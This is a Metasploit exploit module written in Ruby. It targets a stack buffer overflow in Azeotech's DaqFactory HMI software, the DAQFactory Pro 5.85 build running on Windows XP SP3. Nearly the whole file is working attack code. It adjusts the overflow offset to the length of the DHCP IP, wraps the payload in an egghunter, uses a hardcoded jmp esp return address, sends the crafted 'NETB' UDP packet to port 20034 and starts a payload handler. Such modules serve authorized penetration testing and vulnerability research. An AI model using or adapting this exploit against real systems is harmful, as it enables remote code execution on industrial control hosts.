##
# $Id: daq_factory_bof.rb 13750 2011-09-18 02:45:55Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'DaqFactory HMI NETB Request Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Azeotech's DaqFactory
product. The specfic vulnerability is triggered when sending a specially crafted
'NETB' request to port 20034. Exploitation of this vulnerability may take a few
seconds due to the use of egghunter. This vulnerability was one of the 14
releases discovered by researcher Luigi Auriemma.
},
'Author' =>
[
'Luigi Auriemma', # Initial discovery, crash poc
'mr_me <steventhomasseeley[at]gmail.com>', # msf exploit
],
'Version' => '$Revision: 13750 $',
'References' =>
[
['URL', 'http://aluigi.altervista.org/adv/daqfactory_1-adv.txt'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[
'DAQFactory Pro 5.85 Build 1853 on Windows XP SP3',
{
'Ret' => 0x100B9EDF, # jmp esp PEGRP32A.dll
'Offset' => 636,
}
],
],
'DisclosureDate' => 'Sep 13 2011',
'DefaultTarget' => 0))
register_options(
[
# Required for EIP offset
OptString.new('DHCP', [ true, "The DHCP server IP of the target", "" ]),
Opt::RPORT(20034)
], self.class)
end
def exploit
connect_udp
print_status("Trying target #{target.name}...")
eggoptions ={
:checksum => false,
:eggtag => 'scar',
}
# Correct the offset according to the 2nd IP (DHCP) length
iplen = datastore['DHCP'].length
if iplen == 15
offset = 78
elsif iplen == 14
offset = 79
elsif iplen == 13
offset = 80
elsif iplen == 12
offset = 81
elsif iplen == 11
offset = 82
elsif iplen == 10
offset = 83
elsif iplen == 9
offset = 84
elsif iplen == 8
offset = 85
elsif iplen == 7
offset = 86
elsif iplen == 6
offset = 87
# attack class A ip, slightly unlikly, but just in case.
elsif iplen == 5
offset = 88
end
if offset >= 80
pktoffset = offset - 80
finaloffset = target['Offset']-pktoffset
elsif offset <= 79
pktoffset = 80 - offset
finaloffset = target['Offset']+pktoffset
end
# springboard onto our unmodified payload
p = Rex::Arch::X86.jmp(750) + payload.encoded
hunter,egg = generate_egghunter(p, payload_badchars, eggoptions)
sploit = "NETB" # NETB request overflow
sploit << rand_text_alpha_upper(233)
sploit << "\x00" # part of the packet structure
sploit << rand_text_alpha_upper(offset) # include the offset for the DHCP address
sploit << make_nops(2)
sploit << hunter
sploit << rand_text_alpha_upper(52-hunter.length-2)
sploit << [target.ret].pack("V")
sploit << rand_text_alpha_upper(12)
sploit << Rex::Arch::X86.jmp_short(-70)
sploit << egg
# packetlen needs to be adjusted to a max of 0x400 as per advisory
sploit << rand_text_alpha_upper(finaloffset-egg.length)
# The use of rand_text_alpha_upper() ensures we always get the same length for the
# first IP address. See the following for more details:
# http://dev.metasploit.com/redmine/issues/5453
sploit[12,4] = rand_text_alpha_upper(4)
udp_sock.put(sploit)
handler
disconnect_udp
end
end
